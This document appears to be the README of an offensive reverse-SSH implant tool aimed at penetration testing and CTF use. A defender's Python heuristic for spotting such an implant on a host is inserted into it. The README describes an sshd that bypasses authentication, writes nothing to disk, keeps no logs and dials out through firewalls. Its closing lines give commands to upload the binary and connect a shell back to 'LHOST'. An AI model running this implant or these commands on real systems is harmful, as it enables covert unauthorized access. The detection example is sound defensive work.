Do not use in production or on any public facing server. Use only in penetration testing context, while participating in capture the flag competitions or otherwise studying computer security.
The main goal is to have reliable interactive shell access (must be able to run top, sudo, screen, vi, etc.) as opposed to crafted reverse shells or meterpreter, which allow basic commands but fail at interactive ones.
The secondary goal is to implement reverse SSH shell operation. This means that the server must be able to establish a TCP connection in addition to its ability to listen for incoming connections, and vice versa for the client. Once the server has connected to the client, the SSH protocol proceeds as usual, so the client which received the connection gets a shell on the server.
As always, reverse shell operation is meant to bypass firewalls with spotty (if any) egress filtering.
+ must be able to run under any user account; must not require root or elevated privileges.
+ server must not touch the disk: host keys are generated on the fly (insecure), authorized keys and configuration must be encoded within the binary, and there is no logging. Only /dev/urandom and other required device files shall be used.
+ must bypass any and all authentication mechanisms except public key authentication. That is, it must be able to gain access even if ~/.ssh/authorized_keys does not exist, the account is disabled, the account has an invalid shell, etc.
+ zlib and openssl
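The behaviour listed above (an sshd that dials out instead of listening, runs as an unprivileged user, and is not the system binary) is also what a defender can look for on a host. The following is an added detection example written from that viewpoint; it is not part of the blackbear project. The connection records are constructed sample data in the shape of an `ss -tnp` listing enriched with the owning uid and the resolved executable path, and the expected system sshd path is an assumption for this example.

```python
"""Host-side heuristic for a reverse-SSH implant (added example, not project code)."""
from dataclasses import dataclass

# Assumption: where the legitimate sshd binary lives on this host.
SYSTEM_SSHD_PATHS = {"/usr/sbin/sshd"}


@dataclass
class Conn:
    pid: int
    uid: int
    comm: str    # process name as reported by the kernel
    exe: str     # resolved /proc/<pid>/exe target
    laddr: str
    lport: int
    raddr: str   # empty for LISTEN sockets
    rport: int   # 0 for LISTEN sockets
    state: str   # "LISTEN" or "ESTABLISHED"


def listening_sockets(conns):
    """Set of (pid, local port) pairs on which each process accepts connections."""
    return {(c.pid, c.lport) for c in conns if c.state == "LISTEN"}


def is_outbound(c, listen):
    """An ESTABLISHED socket whose local port is not one the process listens on
    was initiated by this host, i.e. the process dialed out."""
    return c.state == "ESTABLISHED" and (c.pid, c.lport) not in listen


def reasons_for(c, listen):
    """Return the list of indicators for one sshd-named connection record.
    Only sshd-named processes are examined here; a renamed binary would need
    the same checks applied on the exe path or on the SSH banner instead."""
    out = []
    if c.comm != "sshd":
        return out
    if is_outbound(c, listen):
        out.append(f"sshd pid {c.pid} initiated an outbound connection to {c.raddr}:{c.rport}")
    if c.uid != 0:
        out.append(f"sshd pid {c.pid} runs as uid {c.uid}, not root")
    if c.exe not in SYSTEM_SSHD_PATHS:
        out.append(f"sshd pid {c.pid} executes from unexpected path {c.exe}")
    return out


def scan(conns):
    """Map pid -> indicators for every process that triggered at least one."""
    listen = listening_sockets(conns)
    findings = {}
    for c in conns:
        for r in reasons_for(c, listen):
            findings.setdefault(c.pid, []).append(r)
    return findings


# Constructed sample: a normal system sshd (pid 812) serving an inbound session,
# and an unprivileged sshd copy in /tmp (pid 4411) that dialed out to port 8022.
SAMPLE = [
    Conn(812, 0, "sshd", "/usr/sbin/sshd", "0.0.0.0", 22, "", 0, "LISTEN"),
    Conn(812, 0, "sshd", "/usr/sbin/sshd", "10.0.0.5", 22, "10.0.0.9", 51234, "ESTABLISHED"),
    Conn(4411, 1000, "sshd", "/tmp/sshd", "10.0.0.5", 40112, "203.0.113.7", 8022, "ESTABLISHED"),
    Conn(2200, 1000, "curl", "/usr/bin/curl", "10.0.0.5", 40200, "198.51.100.4", 443, "ESTABLISHED"),
]

if __name__ == "__main__":
    for pid, rs in scan(SAMPLE).items():
        for r in rs:
            print(r)
```

The three indicators are independent on purpose: an implant that is started as root or dropped over the real sshd path still trips the outbound-connection check, which is the one property the design notes above cannot avoid.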
Download and use:
On your machine, clone the repository and start the client in reverse mode, listening on port 8022:
git clone https://github.com/Marc-andreLabonte/blackbear && cd blackbear
./ssh -i id_blackbearkey -r 0.0.0.0 -p 8022
Upload the sshd binary to the target and run it so that it connects back to you on port 8022:
./sshd -s LHOST -p 8022
You shall receive a shell with the privileges of the account running sshd.